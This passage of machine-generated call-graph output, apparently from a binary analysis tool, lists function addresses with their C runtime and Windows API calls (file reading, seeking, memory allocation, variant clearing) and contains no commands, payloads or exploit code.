__read_nolock 46 API calls 87508->87509 87511 41ae2b 87509->87511 87510->87481 87512 417f25 __read_nolock 10 API calls 87511->87512 87512->87510 87513->87485 87514->87489 87516 414c82 _flsall 87515->87516 87517 414cc3 87516->87517 87518 414c96 __cftoa_l 87516->87518 87527 414cbb _flsall 87516->87527 87519 415471 __lock_file 47 API calls 87517->87519 87542 417f77 46 API calls __getptd_noexit 87518->87542 87521 414ccb 87519->87521 87528 414aba 87521->87528 87522 414cb0 87543 417f25 10 API calls __read_nolock 87522->87543 87527->87162 87532 414ad8 __cftoa_l 87528->87532 87535 414af2 87528->87535 87529 414ae2 87595 417f77 46 API calls __getptd_noexit 87529->87595 87531 414ae7 87596 417f25 10 API calls __read_nolock 87531->87596 87532->87529 87532->87535 87540 414b2d 87532->87540 87544 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87535->87544 87536 414c38 __cftoa_l 87598 417f77 46 API calls __getptd_noexit 87536->87598 87538 414139 __fflush_nolock 46 API calls 87538->87540 87540->87535 87540->87536 87540->87538 87545 41dfcc 87540->87545 87575 41d8f3 87540->87575 87597 41e0c2 46 API calls 3 library calls 87540->87597 87542->87522 87543->87527 87544->87527 87546 41dfd8 _flsall 87545->87546 87547 41dfe0 87546->87547 87548 41dffb 87546->87548 87668 417f8a 46 API calls __getptd_noexit 87547->87668 87550 41e007 87548->87550 87553 41e041 87548->87553 87670 417f8a 46 API calls __getptd_noexit 87550->87670 87551 41dfe5 87669 417f77 46 API calls __getptd_noexit 87551->87669 87556 41e063 87553->87556 87557 41e04e 87553->87557 87555 41e00c 87671 417f77 46 API calls __getptd_noexit 87555->87671 87560 41ae56 ___lock_fhandle 48 API calls 87556->87560 87673 417f8a 46 API calls __getptd_noexit 87557->87673 87563 41e069 87560->87563 87561 41e014 87672 417f25 10 API calls __read_nolock 87561->87672 87562 41e053 87674 417f77 46 API calls __getptd_noexit 87562->87674 87566 41e077 87563->87566 87567 41e08b 87563->87567 87599 41da15 87566->87599 87675 417f77 46 API calls __getptd_noexit 87567->87675 87569 41dfed _flsall 87569->87540 87571 41e090 87676 417f8a 46 API calls __getptd_noexit 87571->87676 87572 41e083 87677 41e0ba LeaveCriticalSection __unlock_fhandle 87572->87677 87576 41d900 87575->87576 87579 41d915 87575->87579 87681 417f77 46 API calls __getptd_noexit 87576->87681 87578 41d905 87682 417f25 10 API calls __read_nolock 87578->87682 87581 41d94a 87579->87581 87589 41d910 87579->87589 87678 420603 87579->87678 87583 414139 __fflush_nolock 46 API calls 87581->87583 87584 41d95e 87583->87584 87585 41dfcc __read 59 API calls 87584->87585 87586 41d965 87585->87586 87587 414139 __fflush_nolock 46 API calls 87586->87587 87586->87589 87588 41d988 87587->87588 87588->87589 87590 414139 __fflush_nolock 46 API calls 87588->87590 87589->87540 87591 41d994 87590->87591 87591->87589 87592 414139 __fflush_nolock 46 API calls 87591->87592 87593 41d9a1 87592->87593 87594 414139 __fflush_nolock 46 API calls 87593->87594 87594->87589 87595->87531 87596->87535 87597->87540 87598->87531 87600 41da31 87599->87600 87601 41da4c 87599->87601 87602 417f8a __read_nolock 46 API calls 87600->87602 87603 41da5b 87601->87603 87605 41da7a 87601->87605 87604 41da36 87602->87604 87606 417f8a __read_nolock 46 API calls 87603->87606 87609 417f77 __read_nolock 46 API calls 87604->87609 87608 41da98 87605->87608 87622 41daac 87605->87622 87607 41da60 87606->87607 87610 417f77 __read_nolock 46 API calls 87607->87610 87611 417f8a __read_nolock 46 API calls 87608->87611 87612 41da3e 87609->87612 87614 41da67 87610->87614 87616 41da9d 87611->87616 87612->87572 87613 41db02 87615 417f8a __read_nolock 46 API calls 87613->87615 87617 417f25 __read_nolock 10 API calls 87614->87617 87618 41db07 87615->87618 87619 417f77 __read_nolock 46 API calls 87616->87619 87617->87612 87620 417f77 __read_nolock 46 API calls 87618->87620 87621 41daa4 87619->87621 87620->87621 87626 417f25 __read_nolock 10 API calls 87621->87626 87622->87612 87622->87613 87623 41dae1 87622->87623 87625 41db1b 87622->87625 87623->87613 87624 41daec ReadFile 87623->87624 87630 41df8f GetLastError 87624->87630 87635 41dc17 87624->87635 87627 416b04 __malloc_crt 46 API calls 87625->87627 87626->87612 87629 41db31 87627->87629 87633 41db59 87629->87633 87634 41db3b 87629->87634 87631 41de16 87630->87631 87632 41df9c 87630->87632 87642 417f9d __dosmaperr 46 API calls 87631->87642 87647 41dd9b 87631->87647 87636 417f77 __read_nolock 46 API calls 87632->87636 87639 420494 __lseeki64_nolock 48 API calls 87633->87639 87637 417f77 __read_nolock 46 API calls 87634->87637 87635->87630 87638 41dc2b 87635->87638 87640 41dfa1 87636->87640 87641 41db40 87637->87641 87638->87647 87648 41dc47 87638->87648 87651 41de5b 87638->87651 87643 41db67 87639->87643 87644 417f8a __read_nolock 46 API calls 87640->87644 87645 417f8a __read_nolock 46 API calls 87641->87645 87642->87647 87643->87624 87644->87647 87645->87612 87646 413748 _free 46 API calls 87646->87612 87647->87612 87647->87646 87649 41dcab ReadFile 87648->87649 87658 41dd28 87648->87658 87652 41dcc9 GetLastError 87649->87652 87661 41dcd3 87649->87661 87650 41ded0 ReadFile 87653 41deef GetLastError 87650->87653 87659 41def9 87650->87659 87651->87647 87651->87650 87652->87648 87652->87661 87653->87651 87653->87659 87654 41ddec MultiByteToWideChar 87654->87647 87655 41de10 GetLastError 87654->87655 87655->87631 87656 41dda3 87664 41dd60 87656->87664 87665 41ddda 87656->87665 87657 41dd96 87660 417f77 __read_nolock 46 API calls 87657->87660 87658->87647 87658->87656 87658->87657 87658->87664 87659->87651 87663 420494 __lseeki64_nolock 48 API calls 87659->87663 87660->87647 87661->87648 87662 420494 __lseeki64_nolock 48 API calls 87661->87662 87662->87661 87663->87659 87664->87654 87666 420494 __lseeki64_nolock 48 API calls 87665->87666 87667 41dde9 87666->87667 87667->87654 87668->87551 87669->87569 87670->87555 87671->87561 87672->87569 87673->87562 87674->87561 87675->87571 87676->87572 87677->87569 87679 416b04 __malloc_crt 46 API calls 87678->87679 87680 420618 87679->87680 87680->87581 87681->87578 87682->87589 87686 4148b3 GetSystemTimeAsFileTime __aulldiv 87683->87686 87685 442c6b 87685->87165 87686->87685 87687->87172 87688->87178 87689->87178 87693 45272f __tzset_nolock _wcscpy 87690->87693 87691 44afef GetSystemTimeAsFileTime 87691->87693 87692 4528a4 87692->87086 87692->87087 87693->87691 87693->87692 87694 414d04 61 API calls __fread_nolock 87693->87694 87695 4150d1 81 API calls _fseek 87693->87695 87694->87693 87695->87693 87697 44b1bc 87696->87697 87698 44b1ca 87696->87698 87699 4149c2 116 API calls 87697->87699 87700 44b1e1 87698->87700 87701 4149c2 116 API calls 87698->87701 87702 44b1d8 87698->87702 87699->87698 87731 4321a4 87700->87731 87703 44b2db 87701->87703 87702->87115 87703->87700 87705 44b2e9 87703->87705 87709 44b2f6 87705->87709 87711 414a46 __fcloseall 82 API calls 87705->87711 87706 44b224 87707 44b253 87706->87707 87708 44b228 87706->87708 87735 43213d 87707->87735 87710 44b235 87708->87710 87713 414a46 __fcloseall 82 API calls 87708->87713 87709->87115 87714 44b245 87710->87714 87716 414a46 __fcloseall 82 API calls 87710->87716 87711->87709 87713->87710 87714->87115 87715 44b25a 87717 44b260 87715->87717 87718 44b289 87715->87718 87716->87714 87720 44b26d 87717->87720 87723 414a46 __fcloseall 82 API calls 87717->87723 87745 44b0bf 87718->87745 87721 44b27d 87720->87721 87724 414a46 __fcloseall 82 API calls 87720->87724 87721->87115 87722 44b28f 87754 4320f8 87722->87754 87723->87720 87724->87721 87727 44b2a2 87729 44b2b2 87727->87729 87730 414a46 __fcloseall 82 API calls 87727->87730 87728 414a46 __fcloseall 82 API calls 87728->87727 87729->87115 87730->87729 87732 4321cb 87731->87732 87734 4321b4 __tzset_nolock _memmove 87731->87734 87733 414d04 __fread_nolock 61 API calls 87732->87733 87733->87734 87734->87706 87736 4135bb _malloc 46 API calls 87735->87736 87737 432150 87736->87737 87738 4135bb _malloc 46 API calls 87737->87738 87739 432162 87738->87739 87740 4135bb _malloc 46 API calls 87739->87740 87741 432174 87740->87741 87742 4320f8 46 API calls 87741->87742 87743 432189 87741->87743 87744 432198 87742->87744 87743->87715 87744->87715 87746 44b18e 87745->87746 87752 44b0da 87745->87752 87766 43206e 87746->87766 87748 442caf 61 API calls 87748->87752 87752->87746 87752->87748 87753 44b19d 87752->87753 87762 442d48 87752->87762 87770 44b040 61 API calls 87752->87770 87753->87722 87755 432109 87754->87755 87757 43210f 87754->87757 87756 413748 _free 46 API calls 87755->87756 87756->87757 87758 413748 _free 46 API calls 87757->87758 87759 432122 87757->87759 87758->87759 87760 413748 _free 46 API calls 87759->87760 87761 432135 87759->87761 87760->87761 87761->87727 87761->87728 87763 442d60 87762->87763 87765 442dbd 87762->87765 87763->87752 87765->87763 87771 4320a4 87765->87771 87767 432092 87766->87767 87768 43207f 87766->87768 87767->87722 87769 4142b6 79 API calls 87768->87769 87769->87767 87770->87752 87772 4320cf 87771->87772 87774 4320e6 87771->87774 87775 4142b6 87772->87775 87774->87765 87776 4142c2 _flsall 87775->87776 87777 4142f2 87776->87777 87778 4142da 87776->87778 87779 4142ea _flsall 87776->87779 87780 415471 __lock_file 47 API calls 87777->87780 87781 417f77 __read_nolock 46 API calls 87778->87781 87779->87774 87782 4142fa 87780->87782 87783 4142df 87781->87783 87784 41415f 77 API calls 87782->87784 87785 417f25 __read_nolock 10 API calls 87783->87785 87786 41430f 87784->87786 87785->87779 87787 414326 LeaveCriticalSection LeaveCriticalSection 87786->87787 87787->87779 87788->87026 87789->87026 87790->87026 87791->87021 87792->87026 87793->87026 87794->87031 87795->87041 87796->87040 87797->87040 87798->87046 87799->87055 87800->87049 87850 410160 87801->87850 87803 41012f GetFullPathNameW 87804 410147 moneypunct 87803->87804 87804->86869 87806 4102cb SHGetDesktopFolder 87805->87806 87808 410333 _wcsncpy 87805->87808 87807 4102e0 _wcsncpy 87806->87807 87806->87808 87807->87808 87809 41031c SHGetPathFromIDListW 87807->87809 87808->86872 87809->87808 87811 4101bb 87810->87811 87813 425f4a 87810->87813 87812 410160 52 API calls 87811->87812 87814 4101c7 87812->87814 87815 4114ab __wcsicoll 58 API calls 87813->87815 87817 425f6e 87813->87817 87854 410200 52 API calls 2 library calls 87814->87854 87815->87813 87817->86874 87818 4101d6 87855 410200 52 API calls 2 library calls 87818->87855 87820 4101e9 87820->86874 87822 40f760 128 API calls 87821->87822 87823 40f584 87822->87823 87824 429335 87823->87824 87825 40f58c 87823->87825 87828 4528bd 118 API calls 87824->87828 87826 40f598 87825->87826 87827 429358 87825->87827 87856 4033c0 113 API calls 7 library calls 87826->87856 87857 434034 86 API calls _wprintf 87827->87857 87831 42934b 87828->87831 87832 429373 87831->87832 87833 42934f 87831->87833 87837 4115d7 52 API calls 87832->87837 87836 431e58 82 API calls 87833->87836 87834 429369 87834->87832 87835 40f5b4 87835->86871 87836->87827 87849 4293c5 moneypunct 87837->87849 87838 42959c 87839 413748 _free 46 API calls 87838->87839 87840 4295a5 87839->87840 87841 431e58 82 API calls 87840->87841 87842 4295b1 87841->87842 87846 401b10 52 API calls 87846->87849 87849->87838 87849->87846 87858 444af8 52 API calls _memmove 87849->87858 87859 44c7dd 64 API calls 3 library calls 87849->87859 87860 44b41c 52 API calls 87849->87860 87861 402780 52 API calls 2 library calls 87849->87861 87862 4022d0 52 API calls moneypunct 87849->87862 87851 410167 _wcslen 87850->87851 87852 4115d7 52 API calls 87851->87852 87853 41017e _wcscpy 87852->87853 87853->87803 87854->87818 87855->87820 87856->87835 87857->87834 87858->87849 87859->87849 87860->87849 87861->87849 87862->87849 87864 402417 87863->87864 87865 402539 moneypunct 87863->87865 87864->87865 87866 4115d7 52 API calls 87864->87866 87865->86878 87867 402443 87866->87867 87868 4115d7 52 API calls 87867->87868 87870 4024b4 87868->87870 87870->87865 87892 402880 87870->87892 87934 4022d0 52 API calls moneypunct 87870->87934 87877 401566 87872->87877 87873 401794 87949 40e9a0 90 API calls 87873->87949 87876 40167a 87879 4017c0 87876->87879 87950 45e737 90 API calls 3 library calls 87876->87950 87877->87873 87877->87876 87878 4010a0 52 API calls 87877->87878 87878->87877 87879->86880 87881 40bc70 52 API calls 87880->87881 87886 40d451 87881->87886 87882 40d50f 87953 410600 52 API calls 87882->87953 87884 427c01 87954 45e737 90 API calls 3 library calls 87884->87954 87885 40e0a0 52 API calls 87885->87886 87886->87882 87886->87884 87886->87885 87888 401b10 52 API calls 87886->87888 87889 40d519 87886->87889 87951 40f310 53 API calls 87886->87951 87952 40d860 91 API calls 87886->87952 87888->87886 87889->86883 87893 4115d7 52 API calls 87892->87893 87894 4028b3 87893->87894 87895 4115d7 52 API calls 87894->87895 87923 4028c5 moneypunct _memmove 87895->87923 87897 402b1e moneypunct 87897->87870 87898 427d62 87900 403350 52 API calls 87898->87900 87910 427d6b 87900->87910 87901 402bb6 87937 403060 53 API calls 87901->87937 87902 402aeb moneypunct 87906 42802b moneypunct 87902->87906 87936 402780 52 API calls 2 library calls 87902->87936 87904 402bca 87907 427f63 87904->87907 87908 402bd4 87904->87908 87905 403350 52 API calls 87905->87923 87944 460879 92 API calls 3 library calls 87907->87944 87938 402780 52 API calls 2 library calls 87908->87938 87933 427f2c 87910->87933 87941 403020 52 API calls _memmove 87910->87941 87912 402bdf 87912->87870 87915 427fd5 87946 460879 92 API calls 3 library calls 87915->87946 87916 402780 52 API calls 87916->87923 87920 427fe4 87947 402780 52 API calls 2 library calls 87920->87947 87921 427fa5 87945 402780 52 API calls 2 library calls 87921->87945 87922 402f00 52 API calls 87922->87923 87923->87898 87923->87901 87923->87902 87923->87905 87923->87915 87923->87916 87923->87921 87923->87922 87924 428000 87923->87924 87926 4026f0 52 API calls 87923->87926 87932 4115d7 52 API calls 87923->87932 87923->87933 87935 4031b0 63 API calls 87923->87935 87939 402f80 92 API calls _memmove 87923->87939 87940 402280 52 API calls 87923->87940 87942 4013a0 52 API calls 87923->87942 87948 460879 92 API calls 3 library calls 87924->87948 87929 402a85 CharUpperBuffW 87926->87929 87929->87923 87931 427f48 87931->87897 87932->87923 87943 460879 92 API calls 3 library calls 87933->87943 87934->87870 87935->87923 87936->87897 87937->87904 87938->87912 87939->87923 87940->87923 87941->87910 87942->87923 87943->87931 87944->87931 87945->87897 87946->87920 87947->87931 87948->87897 87949->87876 87950->87879 87951->87886 87952->87886 87953->87889 87954->87889 87955->86897 87956->86896 87958 42c5fe 87957->87958 87973 4091c6 87957->87973 87959 40bc70 52 API calls 87958->87959 87958->87973 87960 42c64e InterlockedIncrement 87959->87960 87961 42c665 87960->87961 87966 42c697 87960->87966 87963 42c672 InterlockedDecrement Sleep InterlockedIncrement 87961->87963 87961->87966 87962 42c737 InterlockedDecrement 87964 42c74a 87962->87964 87963->87961 87963->87966 87967 408f40 VariantClear 87964->87967 87965 42c731 87965->87962 87966->87962 87966->87965 88241 408e80 VariantClear 87966->88241 87969 42c752 87967->87969 88251 410c60 VariantClear moneypunct 87969->88251 87970 42c6cf 88242 45340c 87970->88242 87973->86926 87974 42c6db 87975 402160 52 API calls 87974->87975 87976 42c6e5 87975->87976 87977 45340c 85 API calls 87976->87977 87978 42c6f1 87977->87978 88248 40d200 52 API calls 2 library calls 87978->88248 87980 42c6fb 88249 465124 53 API calls 87980->88249 87982 42c715 87983 42c76a 87982->87983 87984 42c719 87982->87984 87985 401b10 52 API calls 87983->87985 88250 46fe32 VariantClear 87984->88250 87987 42c77e 87985->87987 87988 401980 53 API calls 87987->87988 87994 42c796 87988->87994 87989 42c812 88258 46fe32 VariantClear 87989->88258 87991 42c82a InterlockedDecrement 88259 46ff07 54 API calls 87991->88259 87993 42c864 88260 45e737 90 API calls 3 library calls 87993->88260 87994->87989 87994->87993 88252 40ba10 87994->88252 87996 42c9ec 87999 42c849 87999->87996 88004 408f40 VariantClear 87999->88004 88007 402780 52 API calls 87999->88007 88012 401980 53 API calls 87999->88012 88262 40a780 87999->88262 88003 42c874 88006 408f40 VariantClear 88003->88006 88014 42ca59 88003->88014 88004->87999 88009 42c891 88006->88009 88007->87999 88261 410c60 VariantClear moneypunct 88009->88261 88012->87999 88014->88014 88016 40afc4 88015->88016 88017 40b156 88015->88017 88018 40afd5 88016->88018 88019 42d1e3 88016->88019 88315 45e737 90 API calls 3 library calls 88017->88315 88023 40a780 259 API calls 88018->88023 88037 40b11a moneypunct 88018->88037 88316 45e737 90 API calls 3 library calls 88019->88316 88022 42d1f8 88028 408f40 VariantClear 88022->88028 88026 40b00a 88023->88026 88024 40b143 88024->86926 88026->88022 88029 40b012 88026->88029 88027 42d4db 88027->88027 88028->88024 88030 40b04a 88029->88030 88031 42d231 VariantClear 88029->88031 88032 40b094 moneypunct 88029->88032 88034 40b05c moneypunct 88030->88034 88317 40e270 VariantClear moneypunct 88030->88317 88031->88034 88033 40b108 88032->88033 88036 42d425 moneypunct 88032->88036 88033->88037 88318 40e270 VariantClear moneypunct 88033->88318 88034->88032 88039 4115d7 52 API calls 88034->88039 88035 42d45a VariantClear 88035->88037 88036->88035 88036->88037 88037->88024 88319 45e737 90 API calls 3 library calls 88037->88319 88039->88032 88042 408fff 88041->88042 88053 40900d 88041->88053 88320 403ea0 52 API calls __cinit 88042->88320 88045 42c3f6 88324 45e737 90 API calls 3 library calls 88045->88324 88047 42c44a 88326 45e737 90 API calls 3 library calls 88047->88326 88048 40a780 259 API calls 88048->88053 88051 42c47b 88327 451b42 61 API calls 88051->88327 88053->88045 88053->88047 88053->88048 88053->88051 88054 42c4cb 88053->88054 88055 42c564 88053->88055 88058 42c548 88053->88058 88060 4090f2 moneypunct 88053->88060 88062 409112 88053->88062 88064 42c528 88053->88064 88066 4090df 88053->88066 88067 4090ea 88053->88067 88323 4534e3 52 API calls 88053->88323 88325 40c4e0 259 API calls 88053->88325 88329 47faae 298 API calls 88054->88329 88059 408f40 VariantClear 88055->88059 88056 42c491 88056->88060 88328 45e737 90 API calls 3 library calls 88056->88328 88332 45e737 90 API calls 3 library calls 88058->88332 88059->88060 88060->86926 88061 42c4da 88061->88060 88330 45e737 90 API calls 3 library calls 88061->88330 88062->88058 88069 40912b 88062->88069 88331 45e737 90 API calls 3 library calls 88064->88331 88066->88067 88321 408e80 VariantClear 88066->88321 88072 408f40 VariantClear 88067->88072 88069->88060 88322 403e10 53 API calls 88069->88322 88072->88060 88074 40914b 88075 408f40 VariantClear 88074->88075 88075->88060 88333 408d90 88076->88333 88078 429778 88362 410c60 VariantClear moneypunct 88078->88362 88080 429780 88081 408cf9 88081->88078 88082 42976c 88081->88082 88084 408d2d 88081->88084 88361 45e737 90 API calls 3 library calls 88082->88361 88349 403d10 88084->88349 88087 408d71 moneypunct 88087->86926 88088 408d45 moneypunct 88088->88087 88089 408f40 VariantClear 88088->88089 88089->88088 88091 4096c6 _wcslen 88090->88091 88092 4115d7 52 API calls 88091->88092 88154 40a70c moneypunct _memmove 88091->88154 88093 4096fa _memmove 88092->88093 88094 4115d7 52 API calls 88093->88094 88097 40971b 88094->88097 88096 4297aa 88098 4115d7 52 API calls 88096->88098 88099 409749 CharUpperBuffW 88097->88099 88101 40976a moneypunct 88097->88101 88097->88154 88141 4297d1 _memmove 88098->88141 88099->88101 88150 4097e5 moneypunct 88101->88150 88882 47dcbb 261 API calls 88101->88882 88103 408f40 VariantClear 88104 42ae92 88103->88104 88910 410c60 VariantClear moneypunct 88104->88910 88106 42aea4 88107 409aa2 88109 4115d7 52 API calls 88107->88109 88114 409afe 88107->88114 88107->88141 88108 40a689 88111 4115d7 52 API calls 88108->88111 88109->88114 88110 4115d7 52 API calls 88110->88150 88128 40a6af moneypunct _memmove 88111->88128 88112 409b2a 88116 429dbe 88112->88116 88177 409b4d moneypunct _memmove 88112->88177 88889 40b400 VariantClear VariantClear moneypunct 88112->88889 88113 40c2c0 52 API calls 88113->88150 88114->88112 88115 4115d7 52 API calls 88114->88115 88117 429d31 88115->88117 88121 429dd3 88116->88121 88890 40b400 VariantClear VariantClear moneypunct 88116->88890 88120 429d42 88117->88120 88886 44a801 52 API calls 88117->88886 88118 409fd2 88126 40a045 88118->88126 88179 42a3f5 88118->88179 88132 40e0a0 52 API calls 88120->88132 88121->88177 88891 40e1c0 VariantClear moneypunct 88121->88891 88122 429a46 VariantClear 88122->88150 88123 408f40 VariantClear 88123->88150 88130 4115d7 52 API calls 88126->88130 88136 4115d7 52 API calls 88128->88136 88137 40a04c 88130->88137 88138 429d57 88132->88138 88133 40ba10 52 API calls 88133->88150 88134 42a42f 88896 45e737 90 API calls 3 library calls 88134->88896 88136->88154 88139 40a0a7 88137->88139 88143 4091e0 384 API calls 88137->88143 88887 453443 52 API calls 88138->88887 88161 40a0af 88139->88161 88897 40c790 VariantClear moneypunct 88139->88897 88140 4299d9 88144 408f40 VariantClear 88140->88144 88909 45e737 90 API calls 3 library calls 88141->88909 88143->88139 88149 4299e2 88144->88149 88145 429abd 88145->86926 88146 429d88 88888 453443 52 API calls 88146->88888 88884 410c60 VariantClear moneypunct 88149->88884 88150->88107 88150->88108 88150->88110 88150->88113 88150->88122 88150->88123 88150->88128 88150->88133 88150->88140 88150->88141 88150->88145 88152 42a452 88150->88152 88156 40a780 259 API calls 88150->88156 88883 40c4e0 259 API calls 88150->88883 88885 40e270 VariantClear moneypunct 88150->88885 88152->88103 88881 4013a0 52 API calls 88154->88881 88156->88150 88157 402780 52 API calls 88157->88177 88159 408f40 VariantClear 88191 40a162 moneypunct _memmove 88159->88191 88160 41130a 51 API calls __cinit 88160->88177 88162 40a11b 88161->88162 88165 42a4b4 VariantClear 88161->88165 88161->88191 88170 40a12d moneypunct 88162->88170 88898 40e270 VariantClear moneypunct 88162->88898 88163 40a780 259 API calls 88163->88177 88164 4115d7 52 API calls 88164->88177 88165->88170 88167 401980 53 API calls 88167->88177 88169 4115d7 52 API calls 88169->88191 88170->88169 88170->88191 88173 44a801 52 API calls 88173->88177 88174 42a74d VariantClear 88174->88191 88175 40a368 88178 42aad4 88175->88178 88185 40a397 88175->88185 88176 40e270 VariantClear 88176->88191 88177->88118 88177->88134 88177->88154 88177->88157 88177->88160 88177->88163 88177->88164 88177->88167 88177->88173 88177->88179 88183 409c95 88177->88183 88892 45f508 52 API calls 88177->88892 88893 403e10 53 API calls 88177->88893 88894 408e80 VariantClear 88177->88894 88902 46fe90 VariantClear VariantClear moneypunct 88178->88902 88895 47390f VariantClear 88179->88895 88180 42a7e4 VariantClear 88180->88191 88181 42a886 VariantClear 88181->88191 88183->86926 88184 40a3ce 88199 40a3d9 moneypunct 88184->88199 88903 40b400 VariantClear VariantClear moneypunct 88184->88903 88185->88184 88210 40a42c moneypunct 88185->88210 88880 40b400 VariantClear VariantClear moneypunct 88185->88880 88188 42abaf 88194 42abd4 VariantClear 88188->88194 88203 40a4ee moneypunct 88188->88203 88189 4115d7 52 API calls 88189->88191 88190 4115d7 52 API calls 88193 42a5a6 VariantInit VariantCopy 88190->88193 88191->88159 88191->88174 88191->88175 88191->88176 88191->88178 88191->88180 88191->88181 88191->88189 88191->88190 88899 470870 52 API calls 88191->88899 88900 408e80 VariantClear 88191->88900 88901 44ccf1 VariantClear moneypunct 88191->88901 88192 40a4dc 88192->88203 88905 40e270 VariantClear moneypunct 88192->88905 88193->88191 88196 42a5c6 VariantClear 88193->88196 88194->88203 88195 40a41a 88195->88210 88904 40e270 VariantClear moneypunct 88195->88904 88196->88191 88197 42ac4f 88204 42ac79 VariantClear 88197->88204 88208 40a546 moneypunct 88197->88208 88199->88195 88201 42ab44 VariantClear 88199->88201 88199->88210 88200 40a534 88200->88208 88906 40e270 VariantClear moneypunct 88200->88906 88201->88210 88203->88197 88203->88200 88204->88208 88205 42ad28 88211 42ad4e VariantClear 88205->88211 88216 40a583 moneypunct 88205->88216 88208->88205 88209 40a571 88208->88209 88209->88216 88907 40e270 VariantClear moneypunct 88209->88907 88210->88188 88210->88192 88211->88216 88213 40a650 moneypunct 88213->86926 88214 42ae0e VariantClear 88214->88216 88216->88213 88216->88214 88908 40e270 VariantClear moneypunct 88216->88908 88217->86926 88218->86926 88219->86926 88220->86907 88221->86912 88222->86926 88223->86926 88224->86926 88225->86926 88226->86921 88227->86921 88228->86921 88229->86921 88230->86921 88231->86921 88232->86921 88234 403cdf 88233->88234 88235 408f40 VariantClear 88234->88235 88236 403ce7 88235->88236 88236->86954 88237->86921 88238->86921 88239->86926 88240->86904 88241->87970 88243 453439 88242->88243 88244 453419 88242->88244 88243->87974 88245 45342f 88244->88245 88305 4531b1 85 API calls 5 library calls 88244->88305 88245->87974 88247 453425 88247->87974 88248->87980 88249->87982 88250->87965 88251->87973 88253 40ba49 88252->88253 88254 40ba1b moneypunct _memmove 88252->88254 88256 4115d7 52 API calls 88253->88256 88255 4115d7 52 API calls 88254->88255 88257 40ba22 88255->88257 88256->88254 88257->87994 88258->87991 88259->87999 88260->88003 88261->87973 88305->88247 88315->88019 88316->88022 88317->88034 88318->88037 88319->88027 88320->88053 88321->88067 88322->88074 88323->88053 88324->88060 88325->88053 88326->88060 88327->88056 88328->88060 88329->88061 88330->88060 88331->88060 88332->88055 88334 4289d2 88333->88334 88335 408db3 88333->88335 88367 45e737 90 API calls 3 library calls 88334->88367 88363 40bec0 88335->88363 88338 4289e5 88368 45e737 90 API calls 3 library calls 88338->88368 88339 408e5a 88339->88081 88341 40ba10 52 API calls 88345 408dc9 88341->88345 88342 428a05 88343 408f40 VariantClear 88342->88343 88343->88339 88344 40a780 259 API calls 88344->88345 88345->88338 88345->88339 88345->88341 88345->88342 88345->88344 88346 408e64 88345->88346 88348 408f40 VariantClear 88345->88348 88347 408f40 VariantClear 88346->88347 88347->88339 88348->88345 88350 408f40 VariantClear 88349->88350 88351 403d20 88350->88351 88352 403cd0 VariantClear 88351->88352 88353 403d4d 88352->88353 88370 4755ad 88353->88370 88373 4813fa 88353->88373 88383 46f993 88353->88383 88422 46e1a6 88353->88422 88470 475596 88353->88470 88473 467897 88353->88473 88354 403d76 88354->88078 88354->88088 88361->88078 88362->88080 88364 40bed0 88363->88364 88365 40bef2 88364->88365 88369 45e737 90 API calls 3 library calls 88364->88369 88365->88345 88367->88338 88368->88342 88369->88365 88517 475077 88370->88517 88372 4755c0 88372->88354 88374 45340c 85 API calls 88373->88374 88375 481438 88374->88375 88376 402880 95 API calls 88375->88376 88377 48143f 88376->88377 88378 481465 88377->88378 88379 40a780 259 API calls 88377->88379 88380 40e710 53 API calls 88378->88380 88382 481469 88378->88382 88379->88378 88381 4814a4 88380->88381 88381->88354 88382->88354 88384 40e710 53 API calls 88383->88384 88385 46f9ba 88384->88385 88386 4115d7 52 API calls 88385->88386 88393 46fa26 88385->88393 88387 46f9d3 88386->88387 88389 46f9df 88387->88389 88677 40da60 53 API calls 88387->88677 88388 46fa38 88388->88354 88391 4533eb 85 API calls 88389->88391 88392 46f9f0 88391->88392 88678 40de40 88392->88678 88393->88388 88397 46fa7a 88393->88397 88663 44c285 88393->88663 88398 46fb17 88397->88398 88399 46fa99 88397->88399 88400 40bc70 52 API calls 88398->88400 88402 4115d7 52 API calls 88399->88402 88404 46fb20 88400->88404 88403 46fa9f 88402->88403 88412 46fab6 88403->88412 88691 443ee5 ReadFile SetFilePointerEx 88403->88691 88666 46ea94 88404->88666 88410 46fb30 88417 46faba moneypunct 88410->88417 88693 40e6a0 53 API calls 88410->88693 88411 46faea _memmove 88416 403cd0 VariantClear 88411->88416 88412->88417 88692 453132 53 API calls __cftoa_l 88412->88692 88416->88417 88418 46fb99 88417->88418 88694 40da20 88417->88694 88418->88354 88420 46fb8b 88698 44ae3e CloseHandle moneypunct 88420->88698 88423 46e1c0 88422->88423 88424 4533eb 85 API calls 88423->88424 88426 46e1dc 88424->88426 88425 46e483 88425->88354 88426->88425 88427 46e2e7 88426->88427 88428 46e1e9 88426->88428 88430 40f760 128 API calls 88427->88430 88429 45340c 85 API calls 88428->88429 88436 46e1f4 _wcscpy _wcschr 88429->88436 88431 46e2f7 88430->88431 88432 46e2fc 88431->88432 88433 46e30d 88431->88433 88434 403cd0 VariantClear 88432->88434 88435 45340c 85 API calls 88433->88435 88437 46e2c8 88434->88437 88438 46e332 88435->88438 88444 46e216 _wcscat _wcscpy 88436->88444 88448 46e248 _wcscat 88436->88448 88440 408f40 VariantClear 88437->88440 88439 413a0e __wsplitpath 46 API calls 88438->88439 88449 46e338 _wcscat _wcscpy 88439->88449 88441 46e2d0 88440->88441 88441->88354 88442 45340c 85 API calls 88443 46e264 _wcscpy 88442->88443 88864 433998 GetFileAttributesW 88443->88864 88446 45340c 85 API calls 88444->88446 88446->88448 88447 46e27d _wcslen 88447->88437 88450 45340c 85 API calls 88447->88450 88448->88442 88452 45340c 85 API calls 88449->88452 88451 46e2b0 88450->88451 88865 44bd27 80 API calls 4 library calls 88451->88865 88455 46e3e3 88452->88455 88471 475077 126 API calls 88470->88471 88472 4755a9 88471->88472 88472->88354 88474 4678bb 88473->88474 88477 45340c 85 API calls 88474->88477 88502 467954 88474->88502 88475 4115d7 52 API calls 88476 467989 88475->88476 88479 467995 88476->88479 88877 40da60 53 API calls 88476->88877 88478 4678f6 88477->88478 88480 413a0e __wsplitpath 46 API calls 88478->88480 88482 4533eb 85 API calls 88479->88482 88483 4678fc 88480->88483 88484 4679b7 88482->88484 88485 401b10 52 API calls 88483->88485 88486 40de40 60 API calls 88484->88486 88487 46790c 88485->88487 88488 4679c3 88486->88488 88875 40d200 52 API calls 2 library calls 88487->88875 88490 4679c7 GetLastError 88488->88490 88491 467a05 88488->88491 88493 403cd0 VariantClear 88490->88493 88494 467a2c 88491->88494 88495 467a4b 88491->88495 88492 467917 88497 4339fa 3 API calls 88492->88497 88492->88502 88496 